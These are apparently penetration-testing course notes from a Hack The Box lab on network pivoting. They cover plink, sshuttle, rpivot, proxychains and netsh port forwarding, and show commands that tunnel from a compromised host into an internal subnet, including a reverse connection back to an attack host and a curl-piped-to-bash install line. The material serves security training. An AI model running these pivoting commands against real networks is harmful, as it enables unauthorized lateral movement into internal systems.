Others tools for pivoting

SSH for Windows: plink.exe

Using Plink.exe

https://www.proxifier.com/

plink -ssh -D 9050 ubuntu@10.129.15.50

SSH Pivoting with Sshuttle

b0ySie7e@htb[/htb]$ sudo apt-get install sshuttle

Running sshuttle

b0ySie7e@htb[/htb]$ sudo sshuttle -r ubuntu@10.129.202.64 172.16.5.0/23 -v

Traffic Routing through iptables Routes

b0ySie7e@htb[/htb]$ nmap -v -sV -p3389 172.16.5.19 -A -Pn

Web Server Pivoting with Rpivot

Cloning rpivot

b0ySie7e@htb[/htb]$ git clone https://github.com/klsecservices/rpivot.git

Installing Python2.7

b0ySie7e@htb[/htb]$ sudo apt-get install python2.7

Alternative Installation of Python2.7

b0ySie7e@htb[/htb]$ curl https://pyenv.run | bash
b0ySie7e@htb[/htb]$ echo 'export PYENV_ROOT="$HOME/.pyenv"' >> ~/.bashrc
b0ySie7e@htb[/htb]$ echo 'command -v pyenv >/dev/null || export PATH="$PYENV_ROOT/bin:$PATH"' >> ~/.bashrc
b0ySie7e@htb[/htb]$ echo 'eval "$(pyenv init -)"' >> ~/.bashrc
b0ySie7e@htb[/htb]$ source ~/.bashrc
b0ySie7e@htb[/htb]$ pyenv install 2.7
b0ySie7e@htb[/htb]$ pyenv shell 2.7

Running server.py from the Attack Host

b0ySie7e@htb[/htb]$ python2.7 server.py --proxy-port 9050 --server-port 9999 --server-ip 0.0.0.0

Transfering rpivot to the Target

b0ySie7e@htb[/htb]$ scp -r rpivot ubuntu@<IpaddressOfTarget>:/home/ubuntu/

Running client.py from Pivot Target

ubuntu@WEB01:~/rpivot$ python2.7 client.py --server-ip 10.10.14.18 --server-port 9999

Backconnecting to server 10.10.14.18 port 9999

Confirming Connection is Established

New connection from host 10.129.202.64, source port 35226

Browsing to the Target Webserver using Proxychains

proxychains firefox-esr 172.16.5.135:80

Connecting to a Web Server using HTTP-Proxy & NTLM Auth

python client.py --server-ip <IPaddressofTargetWebServer> --server-port 8080 --ntlm-proxy-ip <IPaddressofProxy> --ntlm-proxy-port 8081 --domain <nameofWindowsDomain> --username <username> --password <password>

Port Forwarding with Windows Netsh

![[Pasted image 20241019011744.png]]

Using Netsh.exe to Port Forward

C:\Windows\system32> netsh.exe interface portproxy add v4tov4 listenport=8080 listenaddress=10.129.15.150 connectport=3389 connectaddress=172.16.5.25

Verifying Port Forward

C:\Windows\system32> netsh.exe interface portproxy show v4tov4

Listen on ipv4:             Connect to ipv4:

Address         Port        Address         Port
--------------- ----------  --------------- ----------
10.129.42.198   8080        172.16.5.25     3389

PreviousSocat Redirection with a Bind Shell NextTransferencias de Archivos

Last updated 9 months ago

hashtagSSH for Windows: plink.exe

hashtagUsing Plink.exe

hashtagSSH Pivoting with Sshuttle

hashtagRunning sshuttle

hashtagTraffic Routing through iptables Routes

hashtagWeb Server Pivoting with Rpivot

hashtagCloning rpivot

hashtagInstalling Python2.7

hashtagAlternative Installation of Python2.7

hashtagRunning server.py from the Attack Host

hashtagTransfering rpivot to the Target

hashtagRunning client.py from Pivot Target

hashtagConfirming Connection is Established

hashtagBrowsing to the Target Webserver using Proxychains

hashtagConnecting to a Web Server using HTTP-Proxy & NTLM Auth

hashtagPort Forwarding with Windows Netsh

hashtagUsing Netsh.exe to Port Forward

hashtagVerifying Port Forward

SSH for Windows: plink.exe

Using Plink.exe

SSH Pivoting with Sshuttle

Running sshuttle

Traffic Routing through iptables Routes

Web Server Pivoting with Rpivot

Cloning rpivot

Installing Python2.7

Alternative Installation of Python2.7

Running server.py from the Attack Host

Transfering rpivot to the Target

Running client.py from Pivot Target

Confirming Connection is Established

Browsing to the Target Webserver using Proxychains

Connecting to a Web Server using HTTP-Proxy & NTLM Auth

Port Forwarding with Windows Netsh

Using Netsh.exe to Port Forward

Verifying Port Forward